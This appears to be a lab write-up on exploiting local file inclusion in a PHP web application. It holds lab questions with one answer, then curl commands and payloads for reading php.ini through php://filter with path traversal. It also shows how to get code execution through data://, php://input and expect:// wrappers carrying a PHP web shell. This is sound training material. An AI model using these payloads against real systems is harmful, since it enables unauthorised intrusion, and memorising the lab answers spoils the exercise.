Questions

Using the file inclusion find the name of a user on the system that starts with "b".

barry

Submit the contents of the flag.txt file located in the /usr/share/flags directory.

The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

File Disclosure via PHP filters

To check the PHP configuration, read php.ini through the filter wrapper. On Debian/Ubuntu layouts it lives at /etc/php/X.Y/apache2/php.ini for Apache and /etc/php/X.Y/fpm/php.ini for Nginx (PHP-FPM), with X.Y being the PHP version.

curl "http://159.65.95.114:31474/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
or paste the blob into a base64 decoder and search for allow_url_include; the setting to look for is:
allow_url_include = On

RCE with allow_url_include = On (both the data:// and php://input methods below depend on it):

Data Wrapper method:

Payload:data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

In Burp Suite, put the payload in the vulnerable parameter (language in the requests above); the &cmd=id part is the command passed to the stager. The base64 is the URL-encoded form of <?php system($_GET["cmd"]); ?>.

Input method:

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://159.65.95.114:31474/index.php?language=php://input&cmd=id" | grep uid

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Expect method:

The expect wrapper only works if the expect extension is loaded. Grep the decoded php.ini for it; the line to look for is:

extension=expect

curl -s "http://159.65.95.114:31474/index.php?language=expect://id"
